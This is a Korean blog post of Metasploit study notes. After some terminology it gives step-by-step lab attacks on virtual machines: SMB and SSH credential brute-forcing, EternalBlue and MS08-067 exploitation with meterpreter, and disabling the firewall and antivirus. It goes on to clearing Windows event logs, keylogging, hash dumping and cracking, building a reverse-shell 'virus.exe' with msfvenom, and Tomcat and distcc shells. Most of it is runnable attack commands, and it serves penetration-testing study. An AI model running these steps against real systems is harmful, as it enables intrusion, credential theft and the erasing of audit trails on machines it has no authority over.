검색결과 리스트
시스템 보안에 해당되는 글 15건
- 2019.03.07 메타스플로잇
글
메타스플로잇
[메타스플로잇]
1. 특징
- 취약점 분석
- 자동화
- 보안 식별
2. 활용
- 취약점 분석
- 진단
- 침투 테스트
3. 용어
1) 익스플로잇 : 시스템 , 서비스 공격 방법(행위)
2) 페이로드 : 공격 코드
3) 모듈 : 루비(Ruby) 언어의 모듈
4) 세션 : 공격자와 공격 대상자와의 연결
4. 라이브러리/모듈
5. 모듈
1) Exploit
2) auxiliary : 보조 모듈
3) Post : 2차 공격
4) Payload : 공격 코드
6. 인터페이스
1) GUI : armitage
2) TUI(CLI) : msfconsole
3) msfcli
4) msfweb
7. msfconsole 명령어
1) help : 도움말
2) search : 모듈 검색
3) use : 특정 모듈 연결
4) info : 정보 출력
5) set : 모든 설정
6) show : 출력
7) exploit : 모듈 실행 , 공격 명령
[ Kail ]
# msfdb init
# service postgresql restart
# msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 > options
msf5 > set rhosts 192.168.196.130(공격대상)
msf5 > unset rhosts 192.168.196.130 풀어주기
msf5 > options
msf5 > set threads 256
msf5 > options
msf5 > run
msf5 > nmap -T4 -sV -v 192.168.196.130(공격대상)
msf5 > nmap -p 445 192.168.196.130(공격대상)
msf5 > back 초기화면
[ Win7 ]
cmd
net user test 1234 /add
[ Kail ]
msf5 > use auxiliary/scanner/smb/smb_login
msf5 > set smbuser test
msf5 > set smbpass 1234
msf5 > set rhosts 192.168.196.130
msf5 > options
msf5 > run
[ CentOS ]
# systemctl stop firewalld
# systemctl restart sshd
[ Kail ]
msf5 > use auxiliary/scanner/ssh/ssh_version
msf5 > set rhosts 192.168.91.140
msf5 > run
msf5 > use auxiliary/scanner/ssh/ssh_login
msf5 > set rhosts 192.168.91.140
msf5 > set username test
msf5 > set password 1234
msf5 > set stop_on_success true
--- 사전 파일 생성 ---
passw_list
user_list
-----------------------
msf5 > set user_file /user_list
msf5 > set pass_file /passw_list
database
[ 취약점 코드 ]
- 국제 공통 코드 : CVE-2018-0123 2018년도 발견 123번째
- MS사 : ms08-0123 08년 123번째 발견
# nmap -p 445 192.168.91.137
# msfconsole
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 > set payload windows/x64/meterpreter/bind_tcp
msf5 > set rhosts 192.168.91.137
msf5 > set lport 443
msf5 > exploit
meterpreter > shell <-- 직접 접속 가능
meterpreter > screenshot
win xp 공격
msf5 > use windows/smb/ms08_067_netapi
msf5 > set payload windows/vncinject/bind_tcp
msf5 > set rhosts 192.168.91.141
exploit
< 방화벽 중단 명령어 >
shell 에서
netsh firewalld s et opmode=disable
run killav
run post/windows/gather/screen_spy <---- 5초동안 6장을 찍는다
경로 >>> 숨김파일보기 체크 /root/.msf4/loot
run post/windows/gather/enum_applications
> 어떤 app이설치돼었는지
run post/windows/gather/enum_devices
> 어떤 장치들이 설치돼었는지
run post/windows/gather/enum_services
> 실행중인 프로세스
run post/windows/gather/usb_history
> usb 사용내역
[ Win7 ]
use exploit/windows/smb/ms17_
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.91.137
set lport 443
exploit
> getuid
> getpid
> getsystem
> shell
> C:\ > wevtutil_exe cl "System"
> C:\ > wevtutil_exe cl "application"
> C:\ > wevtutil_exe cl "Security"
> exit
meterpreter > ps <--- notepad pid 확인
meterpreter > migrate notepad(pid num)
meterpreter > run post/windows/capture/keylog_recorder
메모장 타이핑
저장위치 cd /root/.msf4/loot/
meterpreter > hashdump
https://crackstation.net/ <---- 해쉬 변환 사이트
해쉬코드 복사해서 /root/pass.txt 파일로 저장
# john --wordlist=/usr/share/john/password.lst --format=NT /root/pass.txt
# john --show --format=NT /root/pass.txt
# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.91.143 lport=4444 -f exe > /root/virus.exe
- 악성 코드 생성
windows 7 으로 파일 옮기기
# vi reverse.rc
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp <--- windows 2008 x32
set lhost 192.168.91.143
set lport 4444
set exitonsession false
exploit -j -z
# msfconsole -r reverse.rc
windows7 에서 악성코드를 실행 희생자 pc 가 공격자에 접속하는 상황
meterpreter > session -i
meterpreter > session -i 1
metasploitable2 설치
root 로 변경
mysql -p mysql
password : enter
update user set password=password('123456') where user='root';
flush privlieges;
# msfconsole
> use auxiliary/scanner/mysql/mysql_hashdump
> set rhosts 192.168.91.146
> set username root
> set password 123456
> run
> use auxiliary/scanner/mysql/mysql_schemadump
> set rhosts 192.168.91.146
> set username root
> set password 123456
> run
[TOM CAT] ( Kail )
192.168.91.146(mt2):8180/manager/html
msf5 > auxiliary/scanner/http/tomcat_mgr_login
msf5 > set rhosts 192.168.91.146
msf5 > set rport 8180
msf5 > run
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set password tomcat
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.91.146
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set httpusername tomcat
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set httppassword tomcat
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > set payload java/shell/bind_tcp
msf5 > auxiliary(scanner/http/tomcat_mgr_login) > exploit
msf5 > use exploit/unix/misc/distcc_exec
msf5 (exploit/unix/misc/distcc_exec) > set payload cmd/unix/bind_ruby
msf5 (exploit/unix/misc/distcc_exec) > set rhost 192.168.91.146
msf5 (exploit/unix/misc/distcc_exec) > exploit
whoami
ctrl + z
msf5 (exploit/unix/misc/distcc_exec) > set rhost 192.168.91.146
msf5 (exploit/unix/misc/distcc_exec) > exploit
whoami
ctrl + z
'시스템 보안' 카테고리의 다른 글
Data Base Command (0) | 2019.03.06 |
---|---|
Xe Web Server 구축 (0) | 2019.03.06 |
apache web server (0) | 2019.03.04 |
DNS (0) | 2019.02.28 |
FTP (0) | 2019.02.27 |